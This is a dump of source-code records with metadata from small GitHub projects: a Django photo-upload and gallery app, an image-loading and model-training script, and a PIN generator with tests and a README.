django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect\n\nfrom imahe.forms import PhotoEditorForm\nfrom imahe.models import Photo\nfrom uploadify.lib import imaging, utils\n\nclass Gallery(ListView):\n template_name = 'imahe/gallery.html'\n \n def get_queryset(self):\n return Photo.objects.filter(owner=self.request.user) \n\nclass Upload(TemplateView):\n template_name = 'imahe/upload.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n return self.render_to_response(context)\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n data = request.FILES['Filedata']\n \n photo = Photo.objects.create(image=data, thumb=data, owner=user)\n # Resize the photo so it has a width of 620 pixels\n imaging.resizeWidth(photo.image.path)\n # Resize the thumbnail to 180x180 pixels\n imaging.fit(photo.thumb.path)\n \n return utils.jsonResponse({\n 'redirect': reverse('imahe_editor', args=[photo.id]),\n 'message': 'Photo uploaded',\n 'status': 'OK'\n })\n else:\n return HttpResponseForbidden()\n \nclass Crop(TemplateView):\n template_name = 'imahe/crop.html'\n \n def post(self, request, *args, **kwargs):\n user = request.user\n \n if user.is_authenticated():\n id = request.POST.get('id')\n \n x1 = int(float(request.POST.get('x1')))\n y1 = int(float(request.POST.get('y1')))\n x2 = int(float(request.POST.get('x2')))\n y2 = int(float(request.POST.get('y2')))\n \n img = get_object_or_404(Photo, id=id)\n \n imaging.crop(img.image.path, (x1, y1, x2, y2))\n imaging.crop(img.thumb.path, (x1, y1, x2, y2))\n \n img.stats = 'C'\n img.save()\n \n return utils.jsonResponse({\n 'status': 'OK'\n })\n else:\n return HttpResponseForbidden()\n \nclass ImageViewer(DetailView):\n template_name = 'imahe/viewer.html'\n context_object_name = 'photo'\n model = 
Photo\n\nclass ImageEditor(TemplateView):\n template_name = 'imahe/editor.html'\n \n def get_context_data(self, **kwargs):\n photo = get_object_or_404(Photo, pk = kwargs.get('pk'))\n form = PhotoEditorForm(instance=photo)\n return {\n 'photo': photo,\n 'form': form\n }\n \n def post(self, request, *args, **kwargs):\n photo = get_object_or_404(Photo, pk=kwargs.get('pk'))\n form = PhotoEditorForm(request.POST, instance=photo)\n \n if form.is_valid():\n title = form.cleaned_data.get('title')\n descr = form.cleaned_data.get('description')\n \n photo.description = descr\n photo.title = title\n photo.save()\n \n return redirect(\n 'imahe_viewer',\n kwargs.get('pk')\n )\n \n return self.render_to_response({\n 'photo': photo,\n 'form': form\n })" }, { "alpha_fraction": 0.5701538324356079, "alphanum_fraction": 0.5735384821891785, "avg_line_length": 33.585105895996094, "blob_id": "3e1772bc00a57d36debc367501ca838743616be0", "content_id": "f335e5c5ca9d9f33db0cada42fb17c2aacbdeee7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3250, "license_type": "no_license", "max_line_length": 91, "num_lines": 94, "path": "/post/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.views.generic import DetailView, TemplateView, View\n\nfrom post.forms import PostForm\nfrom post.models import Post, PostImage\nfrom utils.mixins import JSONResponseMixin\nfrom utils import imaging\n\nclass AddView(TemplateView):\n template_name = 'post/add.html'\n \n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n \n context['session_nm'] = settings.SESSION_COOKIE_NAME\n context['session_ky'] = request.session.session_key\n \n context['postform'] = PostForm()\n context['user'] = request.user\n \n return self.render_to_response(context)\n \nclass AllPost(TemplateView):\n template_name = 
'post/all.html'\n \n def get(self, request, *args, **kwargs):\n context = {\n 'user': request.user,\n 'postform': PostForm()\n }\n \n if request.user.is_authenticated():\n return self._a(request, context, *args, **kwargs)\n else:\n return self._b(request, context, *args, **kwargs)\n \n def _a(self, request, context, *args, **kwargs):\n context['posts'] = Post.objects.filter(author = request.user).order_by('-postdate')\n return self.render_to_response(context)\n \n def _b(self, request, context, *args, **kwargs):\n context['posts'] = Post.objects.all().order_by('-postdate')\n return self.render_to_response(context)\n \nclass AddPost(JSONResponseMixin, View):\n def post(self, request, *args, **kwargs): \n content = request.POST.get('content')\n userid = request.POST.get('userid')\n \n context = { 'status': 0 }\n try:\n user = User.objects.get(id=userid)\n \n if user == request.user:\n post = Post.objects.create(author=user, content=content)\n \n context['message'] = 'New post added.'\n context['postid'] = post.id\n context['status'] = 1\n else:\n context['message'] = 'Invalid user ID.'\n except User.DoesNotExist:\n context['message'] = 'User does not exist.'\n \n return self.render_to_response(context)\n\nclass AddImage(JSONResponseMixin, View):\n def post(self, request, *args, **kwargs):\n postid = request.POST.get('postid')\n \n context = { 'status': 0 }\n try:\n data = request.FILES['Filedata']\n \n post = Post.objects.get(id=postid)\n \n image = PostImage.objects.create(post=post, image=data, thumb=data)\n \n # Resize the photo so it has a width of 620 pixels\n imaging.resizeWidth(image.image.path)\n # Resize the thumbnail to 80x80 pixels\n imaging.resizeThumb(image.thumb.path)\n \n context['message'] = 'New image added.'\n context['imageid'] = image.id\n context['status'] = 1\n except Post.DoesNotExist:\n context['message'] = 'Post does not exist.'\n \n return self.render_to_response(context)\n \nclass ViewView(DetailView):\n model = Post" }, { "alpha_fraction": 
0.5769230723381042, "alphanum_fraction": 0.616550087928772, "avg_line_length": 20.475000381469727, "blob_id": "c2c111a9f05ae53d4761750ed76e69db49e6cd8a", "content_id": "7ac7f92040aeca197b2cccba31372351f5ed6ed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 56, "num_lines": 40, "path": "/utils/imaging.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 5, 2012\n\n@author: pvergil\n'''\n\nimport Image\nimport ImageOps\n\ndef fit(path, size=(180, 180)):\n img = Image.open(path)\n fit = ImageOps.fit(img, size, Image.ANTIALIAS)\n fit.save(path)\n\ndef crop(path, box=(0, 0, 450,450)):\n img = Image.open(path)\n crp = img.crop(box)\n crp.save(path)\n \ndef resize(path, size=(620,620)):\n img = Image.open(path)\n img.thumbnail(size, Image.ANTIALIAS)\n img.save(path)\n \ndef resizeWidth(path, width=620):\n img = Image.open(path)\n \n maxw = width\n \n # Calculate ratio\n rtio = float(maxw) / img.size[0]\n # Calculate max height\n maxh = int(rtio * img.size[1])\n \n img.resize((maxw, maxh), Image.ANTIALIAS).save(path)\n \ndef resizeThumb(path, size=(80, 80)):\n img = Image.open(path)\n fit = ImageOps.fit(img, size, Image.ANTIALIAS)\n fit.save(path)" }, { "alpha_fraction": 0.7030739188194275, "alphanum_fraction": 0.7122302055358887, "avg_line_length": 36.29268264770508, "blob_id": "6021196a93e4709f8cdefd71e673dbdac7193eb2", "content_id": "f5fdb0ca68149750ac33b31ec0757d2420fd7898", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1529, "license_type": "no_license", "max_line_length": 103, "num_lines": 41, "path": "/imahe/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import os\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nfrom uploadify.lib.utils import 
get_random_string\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/images/%d/%d/%d/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumbs/%d/%d/%d/%s%s')\n\ndef _upload(instance, filename, path):\n today = datetime.datetime.now()\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.owner.id, today.year, today.month, today.day, get_random_string(), file_ex)\n\nSTATUS_CHOICES = (\n ('N', 'New'),\n ('C', 'Cropped'),\n)\n\nclass Photo(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n title = models.CharField(max_length=160, default='Untitled')\n description = models.CharField(max_length=255, blank=True, null=True)\n status = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n\nclass Imahe(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n stats = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n title = models.CharField(max_length=255)\n desc = models.CharField(max_length=255, blank=True, null=True)\n" }, { "alpha_fraction": 0.6355828046798706, "alphanum_fraction": 0.6552147269248962, "avg_line_length": 31.639999389648438, "blob_id": "ecc6fd1be986c6550e5f2f8b5aef31b04b60b614", "content_id": "130246659582637879d3936a97cfa82f0b613bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 815, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/accounts/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 28, 2012\n\n@author: pvergil\n'''\n\nfrom django import forms\nfrom 
django.contrib.auth.models import User\n\nclass RegistrationForm(forms.Form):\n fname = forms.CharField(label = 'First Name')\n lname = forms.CharField(label = 'Last Name')\n usrnm = forms.CharField(label = 'Username')\n email = forms.EmailField(label = 'Email', required=False)\n pass1 = forms.CharField(widget = forms.PasswordInput, label = 'Password')\n pass2 = forms.CharField(widget = forms.PasswordInput, label = 'Password Confirmation')\n \n def clean_pass2(self):\n p1 = self.cleaned_data.get('pass1', '')\n p2 = self.cleaned_data.get('pass2', '')\n \n if p1 != p2:\n raise forms.ValidationError('The password and password confirmation did not match')\n \n return p2" }, { "alpha_fraction": 0.7056074738502502, "alphanum_fraction": 0.7172897458076477, "avg_line_length": 22.83333396911621, "blob_id": "67785610522685610071304c209fa626ee273310", "content_id": "f17baba9f00cf16a7823614925b663c84adebed2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 428, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/images/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 9, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\n\nfrom images.views import NewPhotos, Crop\n\nnewPhotos = login_required(NewPhotos.as_view())\ncrop = login_required(Crop.as_view())\n\nurlpatterns = patterns('',\n url(r'^new-photos/$', newPhotos, name='images_newphotos'),\n url(r'^crop/$', crop, name='images_crop'),\n)" }, { "alpha_fraction": 0.7495326995849609, "alphanum_fraction": 0.7607476711273193, "avg_line_length": 27.210525512695312, "blob_id": "ccf0525ea3a826d880ca4ed4b1e9ba70414b9121", "content_id": "dc2e004aad294f54b55a652baf9dc5d722e9c225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 535, 
"license_type": "no_license", "max_line_length": 65, "num_lines": 19, "path": "/uploader/urls.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 26, 2012\n\n@author: vergil\n'''\n\nfrom django.conf.urls.defaults import patterns, url\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom uploader.views import FileUpload, FileUploadHandler\n\nfileUpload = login_required(FileUpload.as_view())\nfileHandler = csrf_exempt(FileUploadHandler.as_view())\n\nurlpatterns = patterns('',\n url(r'^upload/$', fileUpload, name='uploader_fileupload'),\n url(r'^handler/$', fileHandler, name='uploader_filehandler'),\n)" }, { "alpha_fraction": 0.6414309740066528, "alphanum_fraction": 0.6489184498786926, "avg_line_length": 22.58823585510254, "blob_id": "085a0400bf75cc0ddfe9871939b7d37a8db50ff2", "content_id": "cf9f98cee0f066bd6a5a9360da01a1f5af3f8c3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 74, "num_lines": 51, "path": "/uploadify/lib/utils.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Apr 26, 2012\n\n@author: pvergil\n'''\n\nimport os\nimport errno\n\nimport random\nimport string\n\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.utils import simplejson\n\nASCII_CHARS = string.ascii_letters + string.digits \n\ndef get_random_string(length=30):\n return ''.join(random.choice(ASCII_CHARS) for x in xrange(length))\n\ndef save_upload(data, filename=None):\n mdia_dir = settings.MEDIA_ROOT\n upld_dir = 'uploads'\n \n file_nm, file_ex = os.path.splitext(data.name)\n \n if not filename:\n file_nm = '%s%s' % (get_random_string(), file_ex)\n else:\n file_nm = '%s%s' % (filename, file_ex)\n \n dest_fle = os.path.normpath(os.path.join(mdia_dir, upld_dir, file_nm))\n \n 
destination = open(dest_fle, 'wb+')\n for chunk in data.chunks():\n destination.write(chunk)\n destination.close()\n \n return dest_fle\n\ndef make_directory(directory):\n try:\n os.makedirs(directory)\n except OSError, e:\n if e.errno != errno.EEXIST:\n raise e\n \ndef jsonResponse(data):\n return HttpResponse(simplejson.dumps(data),\n content_type = 'application/javascript; charset=utf8')" }, { "alpha_fraction": 0.7136563658714294, "alphanum_fraction": 0.7147576808929443, "avg_line_length": 30.310344696044922, "blob_id": "a63f9cbb2db854fecf60d4ed582e629276c7b063", "content_id": "1d4438486c13ca393077e98617356b979eabffec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "no_license", "max_line_length": 79, "num_lines": 29, "path": "/images/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import os\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.dateformat import format\n\nfrom uploadify.lib.utils import get_random_string\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/image/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumb/%s%s')\n\ndef _upload(instance, filename, path):\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.owner.id, get_random_string(), file_ex)\n\nSTATUS_CHOICES = (\n ('N', 'New'),\n ('C', 'Cropped'),\n)\n\nclass Image(models.Model):\n owner = models.ForeignKey(User)\n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n stats = models.CharField(max_length=1, choices=STATUS_CHOICES, default='N')\n date = models.DateTimeField(auto_now_add=True)\n" }, { "alpha_fraction": 0.6963788270950317, "alphanum_fraction": 0.7130919098854065, "avg_line_length": 26.69230842590332, "blob_id": 
"6a6a6fb097cce197287955102fcfb33f2ee8b74f", "content_id": "a8154ebf930051b6c6447e9b2ea7d190f44c6c41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 359, "license_type": "no_license", "max_line_length": 102, "num_lines": 13, "path": "/imahe/middleware.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on May 22, 2012\n\n@author: pvergil\n'''\n\nfrom django.conf import settings\n\nclass UploadifyMiddleware(object):\n \n def process_request(self, request):\n if request.method == 'POST' and request.POST.has_key(settings.SESSION_COOKIE_NAME):\n request.COOKIES[settings.SESSION_COOKIE_NAME] = request.POST[settings.SESSION_COOKIE_NAME]" }, { "alpha_fraction": 0.6243902444839478, "alphanum_fraction": 0.6487804651260376, "avg_line_length": 13.714285850524902, "blob_id": "12cb482ba27cd1771e04bdb913ba046d937ca1ae", "content_id": "e22b50686a08304b1b941ff462d918c7126c9573", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 205, "license_type": "no_license", "max_line_length": 32, "num_lines": 14, "path": "/post/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Aug 3, 2012\n\n@author: pvergil\n'''\n\nfrom django import forms\n\nfrom post.models import Post\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n fields = ('content',)" }, { "alpha_fraction": 0.689061164855957, "alphanum_fraction": 0.6916451454162598, "avg_line_length": 30.405405044555664, "blob_id": "0408413fdce5950fb7119370feb80249ef50a57e", "content_id": "cf7419446f95243bfd09c19749d5b9fa08584033", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", "max_line_length": 98, "num_lines": 37, "path": "/post/models.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "import 
os\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nimport utils\n\ndef image_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/images/%d/%d/%d/%s%s')\n\ndef thumb_upload(instance, filename):\n return _upload(instance, filename, 'uploads/%d/thumbs/%d/%d/%d/%s%s')\n\ndef _upload(instance, filename, path):\n today = datetime.datetime.now()\n randname = utils.get_random_string()\n file_nm, file_ex = os.path.splitext(filename)\n return path % (instance.post.author.id, today.year, today.month, today.day, randname, file_ex)\n\nclass Post(models.Model):\n author = models.ForeignKey(User)\n content = models.CharField(max_length=255)\n postdate = models.DateTimeField(auto_now_add=True)\n \n @models.permalink\n def get_absolute_url(self):\n return ('post_view', (self.id,))\n \nclass PostImage(models.Model):\n post = models.ForeignKey(Post, related_name='postimages')\n \n image = models.ImageField(upload_to=image_upload)\n thumb = models.ImageField(upload_to=thumb_upload)\n \n def get_absolute_url(self):\n return ('post_image', (self.id,))" }, { "alpha_fraction": 0.561613142490387, "alphanum_fraction": 0.5623599886894226, "avg_line_length": 31.682926177978516, "blob_id": "1a5e653bf6cfbb08da93ab52b26d408f9ed53bea", "content_id": "26f0b0d080843c5a1244137583057af86973bda2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1339, "license_type": "no_license", "max_line_length": 71, "num_lines": 41, "path": "/accounts/views.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "from django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView\n\nfrom accounts.forms import RegistrationForm\n\nclass AccountRegister(TemplateView):\n template_name = 'accounts/register.html'\n \n def get_context_data(self, **kwargs):\n form = 
RegistrationForm()\n return {\n 'form': form\n }\n \n def post(self, request, *args, **kwargs):\n form = RegistrationForm(request.POST)\n \n if form.is_valid():\n fname = form.cleaned_data.get('fname')\n lname = form.cleaned_data.get('lname')\n usrnm = form.cleaned_data.get('usrnm')\n email = form.cleaned_data.get('email')\n passw = form.cleaned_data.get('pass1')\n \n user = User.objects.create_user(usrnm, email, passw)\n user.first_name = fname\n user.last_name = lname\n \n user.save()\n \n messages.info(request,\n '''Your new account has been created.\n You may now login using your username and password.''')\n \n return redirect('account_login')\n else:\n return self.render_to_response({\n 'form': form\n })" }, { "alpha_fraction": 0.7250000238418579, "alphanum_fraction": 0.75, "avg_line_length": 13.357142448425293, "blob_id": "18af9d3601e1d9004ee5194434b9c4e292475466", "content_id": "a2405ccc0e206227dec139ccff2cdf3b43600dcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 38, "num_lines": 14, "path": "/imahe/admin.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 2, 2012\n\n@author: pvergil\n'''\n\nfrom django.contrib import admin\n\nfrom imahe.models import Photo\n\nclass PhotoAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Photo, PhotoAdmin)" }, { "alpha_fraction": 0.6262458562850952, "alphanum_fraction": 0.6362126469612122, "avg_line_length": 30.736841201782227, "blob_id": "207346fdf7817c15c4424a68fa0f77515a5b3eaa", "content_id": "1ff18cd498a25dee0f9ff27f643756a0194c91ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 121, "num_lines": 19, "path": "/imahe/forms.py", "repo_name": "PeithVergil/django-uploadify", "src_encoding": "UTF-8", "text": "'''\nCreated on Jun 11, 
2012\n\n@author: pvergil\n'''\n\nfrom django import forms\n\nfrom imahe.models import Photo\n\nclass PhotoEditorForm(forms.ModelForm):\n title = forms.CharField(label='Title', widget=forms.TextInput(attrs={'placeholder': 'Photo title'}),\n error_messages={'required': 'Please enter a title for this photo.'})\n description = forms.CharField(label='Description', widget=forms.Textarea(attrs={'placeholder': 'Photo Description'}),\n required=False)\n \n class Meta:\n model = Photo\n fields = ('title', 'description',)" } ]
26
b0bbyj0nes/mech_part_recon
https://github.com/b0bbyj0nes/mech_part_recon
833bb4036f4324e3dfdbf9beaa3101a896a1d359
857d8e275627e0a917313f093f51bc5b5c800be9
98897dd750067c02399a09d0c065f9c2b107509b
refs/heads/main
2023-06-06T13:33:45.104366
2021-06-30T07:52:22
2021-06-30T07:52:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5474234223365784, "alphanum_fraction": 0.5631067752838135, "avg_line_length": 27.18947410583496, "blob_id": "861bded4d02bbace182e680f925213e0bbf6229b", "content_id": "8882b966250c874d9a680528fec5ac8575a9442f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2678, "license_type": "no_license", "max_line_length": 70, "num_lines": 95, "path": "/main.py", "repo_name": "b0bbyj0nes/mech_part_recon", "src_encoding": "UTF-8", "text": "#import os\n#import cv2\n#import numpy as np\n#from helpers import load_labels\n#def main() -> ():\n# labels_dir: str = os.path.abspath(\"./labels.json\")\n# labels = load_labels(labels_dir)\n\n# dat_dir: str = os.path.abspath(\"./dat/blnw-images-224\")\n# categories: list = os.listdir(dat_dir)\n# img_array = []\n# labels_array = []\n# img_array_file = os.path.abspath(\"./imgs.npy\")\n# img_labels_file = os.path.abspath(\"./labels.npy\")\n# for cat in categories:\n# imgs_list = os.listdir(f\"{dat_dir}/{cat}\")\n# for img in imgs_list:\n# img_path = os.path.join(dat_dir, cat, img)\n# print(f'loading {img_path}')\n# img_to_dat = cv2.imread(img_path, 0)/255.0\n# img_array.append(img_to_dat)\n# labels_array.append(labels[cat])\n# \n# img_array = np.array(img_array)\n# labels_array = np.array(labels_array)\n\n\n\n#if __name__ == \"__main__\":\n# main()\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # To avoid tensorflow warning\nfrom tensorflow.keras.utils import to_categorical\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\nfrom helpers import *\nfrom this_model import *\n\ndef main() -> ():\n labels_dir: str = os.path.abspath(\"./labels.json\")\n labels = load_labels(labels_dir)\n\n dat_dir: str = os.path.abspath(\"./dat/resized_data\")\n categories: list = os.listdir(dat_dir)\n\n _train: float = 0.75\n\n ## model parameters\n in_shape: tuple = (64, 64, 1)\n num_of_filters: int = 64\n 
kernel_size: tuple = (3, 3)\n\n #training hyper parameters\n epoch: int = 15\n batch_size: int = 64\n\n model = make_model(in_shape, kernel_size, num_of_filters)\n\n imgs: Imgs = Imgs()\n type(imgs)\n for cat in categories:\n imgs_list = os.listdir(f\"{dat_dir}/{cat}\")\n for img in imgs_list:\n img_path = os.path.join(dat_dir, cat, img)\n print(f'{len(imgs)} - loading {img_path}')\n img_to_dat = cv2.imread(img_path, 0)/255.0\n img_obj = Img(img_path, labels[cat], img_to_dat)\n imgs + img_obj\n print(imgs)\n breakpoint()\n\n data, labels = imgs.to_array()\n X_train, X_test, Y_train, Y_test = train_test_split(\n data, \n labels, \n train_size = 0.75, \n test_size = 0.25, \n random_state = 42\n )\n\n\n Y_train = to_categorical(Y_train)\n Y_test = to_categorical(Y_test)\n history = fit_model(X_train, Y_train,\n X_test, Y_test,\n epoch, batch_size,\n model\n )\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
rhobro/qb-pin-gen
https://github.com/rhobro/qb-pin-gen
23bf1c4daf304ce37d9553f2a86523dbbdb87d9d
745ab5d784fa813b2d379a979eaa0a65317ea221
001e7c25547e6ae126a549bf834efd48b1289a1f
refs/heads/master
2023-02-22T20:49:15.851479
2021-01-21T09:58:05
2021-01-21T09:58:05
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5796178579330444, "alphanum_fraction": 0.5796178579330444, "avg_line_length": 30.399999618530273, "blob_id": "fcd1832aedaf3e973d8d81f4480c268c18e2bf89", "content_id": "546686b66ad8dd596572d7e30362b849d82458ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 51, "num_lines": 5, "path": "/customer.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "class Customer:\n def __init__(self, account_n, sort, past_pins):\n self.acc = account_n\n self.sort = sort\n self.past_pins = past_pins\n" }, { "alpha_fraction": 0.5395962595939636, "alphanum_fraction": 0.6746894121170044, "avg_line_length": 41.93333435058594, "blob_id": "1a06c61b57bf7336d332f3ea7b5c7dc61ef128f3", "content_id": "cd25d2353bba5b35a098804585062712b7a8cbb2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1288, "license_type": "no_license", "max_line_length": 98, "num_lines": 30, "path": "/test.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "from condition import *\nfrom customer import Customer\n\n# Inputs - change as necessary\nCUSTOMER_BANK_ACCOUNT_NUMBER = \"13659275\"\nCUSTOMER_BANK_SORT_CODE = \"23-05-33\"\nCUSTOMER_PREVIOUS_PINS = [\"1948\", \"4729\", \"6758\", \"3648\"]\n\n# customer and generator construction\nc = Customer(CUSTOMER_BANK_ACCOUNT_NUMBER, CUSTOMER_BANK_SORT_CODE, CUSTOMER_PREVIOUS_PINS)\n\nseq = MoreThan2Consec().filter([\"1133\", \"2226\", \"6227\", \"4888\", \"9879\"])\nif \"2226\" in seq or \"4888\" in seq:\n print(f\"MoreThan2Consec().filter() missed consecutive sequence of 2 numbers, producing {seq}\")\n\nseq = ConsecSeq().filter([\"1388\", \"2434\", \"2345\", \"1123\", \"6789\"])\nif \"2345\" in seq or \"6789\" in seq:\n print(f\"ConsecSeq().filter() missed consecutive sequence, producing {seq}\")\n\nseq = PrevPins(3).filter([\"1133\", 
\"2226\", \"4729\", \"4888\", \"6758\"], c)\nif \"4729\" in seq or \"6758\" in seq:\n print(f\"PrevPins().filter() missed previous pins, producing {seq}\")\n\nseq = InAccNum().filter([\"6592\", \"2226\", \"6227\", \"9275\", \"9879\"])\nif \"6592\" in seq or \"9275\" in seq:\n print(f\"InAccNum().filter() missed pins in account number, producing {seq}\")\n\nseq = InSortCode().filter([\"1133\", \"2226\", \"0533\", \"4888\", \"3053\"])\nif \"0533\" in seq or \"3053\" in seq:\n print(f\"InSortCode().filter() missed pins in sort code, producing {seq}\")\n" }, { "alpha_fraction": 0.7043618559837341, "alphanum_fraction": 0.7560581564903259, "avg_line_length": 27.136363983154297, "blob_id": "b1a58a48733cb1423f64e28d27d21d5f51f1d322", "content_id": "16d3ff96e500026cf7bb35007d39f7a0704bf35f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 619, "license_type": "no_license", "max_line_length": 91, "num_lines": 22, "path": "/main.py", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "from condition import *\nfrom customer import Customer\nfrom gen import Generator\n\n# Inputs - change as necessary\nCUSTOMER_BANK_ACCOUNT_NUMBER = \"13659275\"\nCUSTOMER_BANK_SORT_CODE = \"23-05-33\"\nCUSTOMER_PREVIOUS_PINS = [\"1948\", \"4729\", \"6758\", \"3648\"]\n\n# customer and generator construction\nc = Customer(CUSTOMER_BANK_ACCOUNT_NUMBER, CUSTOMER_BANK_SORT_CODE, CUSTOMER_PREVIOUS_PINS)\ngen = Generator()\n\n# Add more conditions as necessary\ngen.add_cond(MoreThan2Consec())\ngen.add_cond(ConsecSeq())\ngen.add_cond(PrevPins(depth=3))\ngen.add_cond(InAccNum())\ngen.add_cond(InSortCode())\n\n# running the generator\nprint(gen.gen(c))\n" }, { "alpha_fraction": 0.7403903007507324, "alphanum_fraction": 0.7569485306739807, "avg_line_length": 45.97222137451172, "blob_id": "cefd25843e0e4eb3d25a80f5ffb785d0382047b2", "content_id": "64c9b71e073a819adf320eac3ce83ea91008eac9", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Markdown", "length_bytes": 3382, "license_type": "no_license", "max_line_length": 120, "num_lines": 72, "path": "/README.md", "repo_name": "rhobro/qb-pin-gen", "src_encoding": "UTF-8", "text": "# QuantBet \"QuantBank\" Challenge\n\n### Challenge Description\n\nQuantBet is opening a new bank called QuantBank and require you to write a piece of software to generate new PINs for\ncustomer cards. When generating a PIN, you will be provided with the customer's personal details (eg name, date of\nbirth), and the details of the bank account (eg sort code, account number). The generated PIN must satisfy the following\nrules:\n\n- It should be 4 digits long\n- It must not contain more than two consecutive numbers (eg 1112, 1111 are not allowed; 1211 is allowed)\n- It must not contain a complete consecutive number sequence (eg 1234, 3456 are not allowed)\n- It is distinct from the user's past three PINs (you may assume that a sufficient history is provided alongside the\n bank account details)\n- It cannot be contained in the user's bank account number or sort code (eg for an account with sort code 71-13-13 and\n account number 13561342, the PINs 1356, 1342 and 7113 are all not allowed)\n\n### Installation\n\n- This solution has been developed and tested on `Python 3.8.5`. However, it should be compatible with all Python 3\n installations\n- To run the main script, use `python main.py` after altering the parameters in the file to suit your needs.\n- To run tests on the code, use `python test.py`.\n\n### Design\n\n- `main.py` - contains the runnable script\n- `test.py` - contains the tests that can be performed to check for bugs\n- `gen.py` - contains the configuration for the `Generator` class\n- `condition.py` - contains the definition of `Condition` interface as well as classes which satisfy it. 
